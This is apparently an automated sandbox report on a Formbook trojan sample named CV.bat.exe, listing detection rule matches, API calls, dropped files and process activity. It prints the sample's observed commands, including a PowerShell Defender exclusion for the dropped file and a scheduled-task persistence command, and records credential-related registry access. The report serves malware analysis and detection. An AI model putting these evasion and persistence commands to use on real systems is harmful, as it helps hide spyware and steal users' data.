Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: CV.bat.exe PID: 5060, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: chkdsk.exe PID: 1264, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 0_2_00EBE9E3	0_2_00EBE9E3
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 0_2_00EBE9F0	0_2_00EBE9F0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 0_2_00EBCA4C	0_2_00EBCA4C
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 0_2_04E4AED8	0_2_04E4AED8
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01240D20	8_2_01240D20
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01264120	8_2_01264120
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124F900	8_2_0124F900
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01312D07	8_2_01312D07
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01311D55	8_2_01311D55
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01272581	8_2_01272581
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125D5E0	8_2_0125D5E0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_013125DD	8_2_013125DD
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301002	8_2_01301002
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125841F	8_2_0125841F
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130D466	8_2_0130D466
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012720A0	8_2_012720A0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_013120A8	8_2_013120A8
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125B090	8_2_0125B090
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_013128EC	8_2_013128EC
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01312B28	8_2_01312B28
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127EBB0	8_2_0127EBB0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01311FF1	8_2_01311FF1
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130DBD2	8_2_0130DBD2
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01266E30	8_2_01266E30
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_013122AE	8_2_013122AE
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01312EF7	8_2_01312EF7
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004012A3	8_2_004012A3
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004219A0	8_2_004219A0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_00421A9A	8_2_00421A9A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004012B4	8_2_004012B4
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0042134D	8_2_0042134D
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004044C7	8_2_004044C7
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004044BE	8_2_004044BE
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0040B513	8_2_0040B513
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0040B517	8_2_0040B517
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_00422672	8_2_00422672
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004046E7	8_2_004046E7
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0040FF57	8_2_0040FF57

Source: C:\Users\user\Desktop\CV.bat.exe

Code function: String function: 0124B150 appears 35 times

Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289910 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_01289910
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289540 NtReadFile,LdrInitializeThunk,	8_2_01289540
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012899A0 NtCreateSection,LdrInitializeThunk,	8_2_012899A0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012895D0 NtClose,LdrInitializeThunk,	8_2_012895D0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289860 NtQuerySystemInformation,LdrInitializeThunk,	8_2_01289860
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289840 NtDelayExecution,LdrInitializeThunk,	8_2_01289840
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012898F0 NtReadVirtualMemory,LdrInitializeThunk,	8_2_012898F0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289710 NtQueryInformationToken,LdrInitializeThunk,	8_2_01289710
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012897A0 NtUnmapViewOfSection,LdrInitializeThunk,	8_2_012897A0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289780 NtMapViewOfSection,LdrInitializeThunk,	8_2_01289780
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289FE0 NtCreateMutant,LdrInitializeThunk,	8_2_01289FE0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289A20 NtResumeThread,LdrInitializeThunk,	8_2_01289A20
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289A00 NtProtectVirtualMemory,LdrInitializeThunk,	8_2_01289A00
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289660 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_01289660
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289A50 NtCreateFile,LdrInitializeThunk,	8_2_01289A50
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012896E0 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_012896E0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289520 NtWaitForSingleObject,	8_2_01289520
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0128AD30 NtSetContextThread,	8_2_0128AD30
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289560 NtWriteFile,	8_2_01289560
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289950 NtQueueApcThread,	8_2_01289950
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012895F0 NtQueryInformationFile,	8_2_012895F0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012899D0 NtCreateProcessEx,	8_2_012899D0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289820 NtEnumerateKey,	8_2_01289820
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0128B040 NtSuspendThread,	8_2_0128B040
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012898A0 NtWriteVirtualMemory,	8_2_012898A0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289730 NtQueryVirtualMemory,	8_2_01289730
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289B00 NtSetValueKey,	8_2_01289B00
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0128A710 NtOpenProcessToken,	8_2_0128A710
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289760 NtOpenProcess,	8_2_01289760
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289770 NtSetInformationFile,	8_2_01289770
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0128A770 NtOpenThread,	8_2_0128A770
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0128A3B0 NtGetContextThread,	8_2_0128A3B0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289610 NtEnumerateValueKey,	8_2_01289610
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289A10 NtQuerySection,	8_2_01289A10
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289670 NtQueryInformationProcess,	8_2_01289670
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289650 NtQueryValueKey,	8_2_01289650
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289A80 NtOpenDirectoryObject,	8_2_01289A80
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012896D0 NtCreateKey,	8_2_012896D0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0041E057 NtClose,	8_2_0041E057
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0041E107 NtAllocateVirtualMemory,	8_2_0041E107
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004012A3 NtProtectVirtualMemory,	8_2_004012A3
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0041DF27 NtCreateFile,	8_2_0041DF27
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0041DFD7 NtReadFile,	8_2_0041DFD7
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0041E183 NtAllocateVirtualMemory,	8_2_0041E183
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004012B4 NtProtectVirtualMemory,	8_2_004012B4
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004014E9 NtProtectVirtualMemory,	8_2_004014E9

Source: CV.bat.exe, 00000000.00000002.314709188.0000000006FA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameWebName.dll4 vs CV.bat.exe
Source: CV.bat.exe, 00000000.00000002.302340315.00000000027D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs CV.bat.exe
Source: CV.bat.exe, 00000000.00000002.302340315.00000000027D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWebName.dll4 vs CV.bat.exe
Source: CV.bat.exe, 00000000.00000000.255904750.0000000000432000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCuHs.exeL vs CV.bat.exe
Source: CV.bat.exe, 00000000.00000002.306226428.0000000003890000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMetal.dllJ vs CV.bat.exe
Source: CV.bat.exe, 00000000.00000002.305574827.00000000037D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTargetParameterCount.dll> vs CV.bat.exe
Source: CV.bat.exe, 00000000.00000002.314741085.0000000007170000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMetal.dllJ vs CV.bat.exe
Source: CV.bat.exe, 00000008.00000003.303017091.000000000119F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs CV.bat.exe
Source: CV.bat.exe, 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs CV.bat.exe
Source: CV.bat.exe, 00000008.00000003.299197168.0000000001006000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs CV.bat.exe
Source: CV.bat.exe	Binary or memory string: OriginalFilenameCuHs.exeL vs CV.bat.exe

Source: CV.bat.exe	ReversingLabs: Detection: 33%
Source: CV.bat.exe	Virustotal: Detection: 34%

Source: C:\Users\user\Desktop\CV.bat.exe

File read: C:\Users\user\Desktop\CV.bat.exe

Jump to behavior

Source: CV.bat.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\CV.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\CV.bat.exe C:\Users\user\Desktop\CV.bat.exe
Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Users\user\Desktop\CV.bat.exe C:\Users\user\Desktop\CV.bat.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Users\user\Desktop\CV.bat.exe C:\Users\user\Desktop\CV.bat.exe	Jump to behavior

Source: C:\Users\user\Desktop\CV.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\CV.bat.exe

File created: C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe

Jump to behavior

Source: C:\Users\user\Desktop\CV.bat.exe

File created: C:\Users\user\AppData\Local\Temp\tmpE00F.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/8@6/2

Source: C:\Users\user\Desktop\CV.bat.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: CV.bat.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\CV.bat.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5152:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\CV.bat.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\chkdsk.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: CV.bat.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: CV.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: CV.bat.exe, 00000008.00000003.301579831.0000000001080000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000003.297213118.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.417519841.00000000054B4000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.531741340.0000000005800000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.421300076.000000000566D000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.533143376.000000000591F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: CV.bat.exe, CV.bat.exe, 00000008.00000003.301579831.0000000001080000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000003.297213118.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.417519841.00000000054B4000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.531741340.0000000005800000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.421300076.000000000566D000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.533143376.000000000591F000.00000040.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: CV.bat.exe, NetworkArithmeticGame/Form1.cs	.Net Code: UYR0010453 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: PzKpucfDtCCmww.exe.0.dr, NetworkArithmeticGame/Form1.cs	.Net Code: UYR0010453 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.CV.bat.exe.430000.0.unpack, NetworkArithmeticGame/Form1.cs	.Net Code: UYR0010453 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0129D0D1 push ecx; ret	8_2_0129D0E4
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0042125C push eax; ret	8_2_004212AF
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0040C21E push esp; retf	8_2_0040C226
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004212A9 push eax; ret	8_2_004212AF
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004212B2 push eax; ret	8_2_00421319
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_00421313 push eax; ret	8_2_00421319
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004223AD push ecx; retf	8_2_004223AE

Source: C:\Users\user\Desktop\CV.bat.exe

File created: C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\CV.bat.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\SysWOW64\chkdsk.exe

File deleted: c:\users\user\desktop\cv.bat.exe

Jump to behavior

Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
